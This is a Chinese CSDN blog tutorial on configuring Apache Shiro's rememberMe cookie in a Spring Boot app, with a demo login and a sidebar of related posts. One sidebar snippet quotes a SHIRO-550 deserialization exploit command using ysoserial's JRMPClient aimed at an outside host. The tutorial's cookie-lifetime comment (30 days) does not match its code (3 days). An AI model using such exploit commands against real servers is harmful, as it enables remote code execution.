三.shiro:remember me

最新推荐文章于 2024-05-06 08:30:00 发布
最新推荐文章于 2024-05-06 08:30:00 发布
阅读量1k 收藏 2
点赞数
分类专栏: shiro 文章标签: remember me shiro springboot
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014203449/article/details/79331420
版权

访问地址:

搭建1:https://blog.csdn.net/u014203449/article/details/79330811

搭建2:https://blog.csdn.net/u014203449/article/details/79331417

访问地址地址:点击打开链接 http://47.98.153.30:8080/      账号:melo 密码:12345678

github地址:点击打开链接https://github.com/MeloFocus/focus

 

举个栗子:登录淘宝,关闭浏览器,再打开浏览器淘宝页面,发现已经登录了,可以浏览,但进入我的订单会提示再次登录。就是remember me 功能

1.配置记住我管理器,将cookie管理器注入其中

@Bean  
	public SimpleCookie rememberMeCookie(){  
	  
	       System.out.println("ShiroConfiguration.rememberMeCookie()");  
	       //这个参数是cookie的名称,对应前端的checkbox的name = rememberMe  
	       SimpleCookie simpleCookie = new SimpleCookie("rememberMe");  
	       //<!-- 记住我cookie生效时间30天 ,单位秒;-->  
	       simpleCookie.setMaxAge(259200);  
	       return simpleCookie;  
	}  
	/**  
	  * cookie管理对象;  
	  * @return  
	  */  
	@Bean  
	public CookieRememberMeManager rememberMeManager(){  
	  
	       System.out.println("ShiroConfiguration.rememberMeManager()");  
	       CookieRememberMeManager cookieRememberMeManager = new CookieRememberMeManager();  
	       cookieRememberMeManager.setCookie(rememberMeCookie());  
	       return cookieRememberMeManager;  
	}

2.将记住我管理器注入安全管理器

@Bean
	public SecurityManager securityManager() {
		DefaultWebSecurityManager securityManager = new DefaultWebSecurityManager();
		// 设置realm.
		securityManager.setRealm(myShiroRealm());
		
		//将缓存注入安全管理器,就不会反复执行  realm的授权方法了;只要实现了shiro的cache接口、CacheManager接口就可以用来注入安全管理器
		//shiro自带的一个内存缓存,本质是hashmap,MemoryConstrainedCacheManager(),试验没问题,非常轻,简单的登录用这个
		//securityManager.setCacheManager(new MemoryConstrainedCacheManager());
		
		//用了redis缓存注入安全管理器,会报一个序列化失败的错误,推测是new SimpleAuthenticationInfo 时 user对象无法序列化,加上序列化就好了
		securityManager.setCacheManager(cacheManager());
		
		//将session托管给redis,nigix试验分布式,确实 做到了session共享
		securityManager.setSessionManager(SessionManager());
		
		  //注入记住我管理器;  
	    securityManager.setRememberMeManager(rememberMeManager()); 
		return securityManager;
	}

3.当访问指定路径资源时,只需要记录我就能访问,则在ShiroFilterFactoryBean添加记住我过滤器:user

如果一个url已经设置过了anno或authc 就不要再次设置 
@Bean
	public ShiroFilterFactoryBean shirFilter(SecurityManager securityManager) {
		省略。。
		
		// 过滤链定义,从上向下顺序执行,一般将 /**放在最为下边 
		// <!-- authc:所有url都必须认证通过才可以访问; anon:所有url都都可以匿名访问;user:remember me的可以访问-->
		filterChainDefinitionMap.put("/fine", "user");  
		filterChainDefinitionMap.put("/**", "authc");
		shiroFilterFactoryBean.setFilterChainDefinitionMap(filterChainDefinitionMap);
		System.out.println("Shiro拦截器工厂类注入成功");
		return shiroFilterFactoryBean;
	}

4.创建Token后,加上token.setRememberMe(true)

		String account=user.getLoginName();
		String password=user.getPassword();
		UsernamePasswordToken token = new UsernamePasswordToken(account,password,false);
		token.setRememberMe(true); 
		Subject currentUser = SecurityUtils.getSubject();
		try {
			currentUser.login(token);
			//此步将 调用realm的认证方法
		} catch(IncorrectCredentialsException e){
			//这最好把 所有的 异常类型都背会
			model.addAttribute("message", "密码错误");
			return "login";
		} catch (AuthenticationException e) {
			model.addAttribute("message", "登录失败");
			return "login";
		}

登录后可以看到有个name是rememberMe 的cookie

 

科氏加速度
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
跟我学Shiro第13章Demo(RememberMe)
09-23
本人亲自写的Demo,可运行没问题,其中包括RememberMy章节的髌,可以用jetty运行,我把Ehcache缓存改成了3秒,有需要可以自己改回来。
shiro - rememberMe
The Secret
02-07 279
applicationContext-shiro.xml 我这里只列出rememberMe需要添加的部分,详细的,最下面有。   &lt;bean id="rememberMeCookie" class="org.apache.shiro.web.servlet.SimpleCookie"&gt; &lt;property name="name" value="...
Shiro——rememberMe允许用户在下次访问应用时免除重新登录,保持持久性的登录状态
最新发布
程序员阿皓的博客
05-06 147
Shiro——rememberMe允许用户在下次访问应用时免除重新登录,保持持久性的登录状态
Shiro记住我(RememberMe)
Hern(宋兆恒)
12-17 6074
简介 Shiro 提供了记住我(RememberMe)的功能,比如访问如淘宝 等一些网站时,关闭了浏览器,下次再打开时还是能记住你是谁, 下次访问时无需再登录即可访问,基本流程如下: • 登录页面选中RememberMe然后登录成功;如果是浏览器登录,一般会把RememberMe 的Cookie写到客户端并保存下来; 关闭浏览器再重新打开;会发现浏览器还是记住你的; 访问一般的网页服务器端...
Shiro的rememberMe功能
weixin_65824274的博客
07-05 1553
当登录后是可以正常访问/man的主页的,如果使用了记住我功能,会在浏览器写入cookie,关掉浏览器不需要登录即可直接访问/main.Shiro 提供了记住我(RememerMe)的功能,比如访问一些网站时,关闭了浏览器,下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。4.但是,如果我们访问电商平台时,如果要查看我的订单或进行支付时,此时还 是需要再进行身份认证的,以确保当前用户还是你。2.登录时不勾选记住我,关闭浏览器访问主页/main还会拦截到登录页;1.配置记住我功能的cookie设置;
Shiro安全框架》专题(十)-Shiro之rememberMe
02-02 1127
文章目录1.Remember me简介2.登录表单中添加记住我复选框3.配置文件中配置4.登录控制器5.测试 1.Remember me简介 Shiro提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站时,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问,基本流程如下: 1.首先在登录页面选中RememberMe然后登录成功;如果是浏览器登录,一般会把RememberMe的Cookie写到客户端并保存下来; 2.关闭浏览器再重新打开;会发现浏览器还是记住你的; 3.访
SHIRO-721:RememberMe填充Oracle漏洞RCE
03-08
SHIRO-721 RememberMe填充Oracle漏洞RCE 0x00简介: cookie的cookiememeMe已通过AES-128-CBC模式加密,这很容易受到填充oracle攻击的影响。 攻击者可以使用有效的RememberMe cookie作为填充Oracle Attack的前缀,...
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550)commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT...
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 ...
Apache Shiro Remember Me服务
热门推荐
王浩的技术博客
03-29 1万+
Shiro提供Remember服务,AuthenticationToken需要实现org.apache.shiro.authc.RememberMeAuthenticationToken接口,此接口提供了一个方法: boolean isRememberMe(); 如果该方法返回true,则Shiro 将会在整个会话中记住终端用户的身份ID。 注:经常使用的Us
Spring Security 构建rest服务实现rememberme 记住我功能
08-27
主要介绍了Spring Security 构建rest服务实现rememberme 记住我功能,需要的朋友可以参考下
Shiro 实现 RememberMe 功能
暗星涌动
10-08 5405
本文内容:Shiro 中RememberMe 功能的介绍以及实现。1介绍Shiron 提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站时,关闭了浏览器...
shiro中rememberMe的使用
abou15871390117的博客
11-14 1050
1.根据系统安全首先将用到的ActiveUser和SysPermission这两个类进行系列化接口 2.在安全管理气的属性中配置rememberMe,并设置失效时间, 3.在页面中添加rememberMe这个选项 4.在自定义的form认证过滤器中的bean属性中添加rememberMe 记住我 用户登陆选择“自动登陆”本次登陆成功会向cookie写身份信息,下次登陆从cooki
shiro学习笔记(9)——验证码+RememberMe
xinpz的博客
08-10 981
 5.17 验证码   5.17.1 思路 shiro使用FormAuthenticationFilter进行表单认证,验证校验的功能应该加在FormAuthenticationFilter中,在认证之前进行验证码校验。   需要写FormAuthenticationFilter的子类,继承FormAuthenticationFilter,改写它的认证方法,在认证之前进行验证码校验。  ...
SpringBoot+Shiro学习(八):RememberMe
weixin_34319817的博客
12-16 206
这一章比较简单,就不多说了,上代码: /** * cookie对象; * rememberMeCookie()方法是设置Cookie的生成模版,比如cookie的name,cookie的有效时间等等。 * @return */ @Bean public SimpleCookie rememberMeCookie(){ //System.out....
PHP remember me
chengyangyy的专栏
09-21 1853
首先是remember.php,这个略复杂一点点,php混合html真是个强大的工具 name :'/> passwd :'/> <?php if($_COOKIE['remember'] == 1) { ?> <?php } else { //看来还是要加{}在else里,不然会出错. ?>
shiro学习29-实现rememberMe功能-RememberMeManager
iteye_14612的博客
02-18 3064
这个接口是用来实现rememberme的功能的。他的实现类为AbstractRememberMeManager,是一个抽象类,最终的继承类为cookieRememberMeManager,即将信息发送到cookie中。 先看一下defaultWebSecurityManager的构造方法:   public DefaultWebSecurityManager() { s...
Spring+Shiro权限管理 (四) 为Shiro添加RememberMe(记住我)功能
Escorts的博客
09-26 1049
废话少说,进入正题。 思路: 1、ApplicationContext.xml中,配置 CookieRememberMeManager (记住我的Cookie管理器); 2、CookieRememberMeManager需要Cookie,我们配置一个Shiro的Cookie实现类 SimpleCookie ; 3、把CookieRememberMeManager配置进Shiro的Se...
shiro mgt包下RememberMeManager接口
weixin_45912825的博客
12-13 457
2021SC@SDUSC RememberMeManager 负责在该主题与应用程序的会话中记住该主题的身份 接口 getRememberedPrincipals PrincipalCollection getRememberedPrincipals(SubjectContext subjectContext); 基于用于构建主题实例的指定主题上下文映射,返回主题的任何先前记住的主体以进行自动身份关联(又名“记住我”)。 上下文映射通常由Subject.Builder实现填充。 请参阅 Shi

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值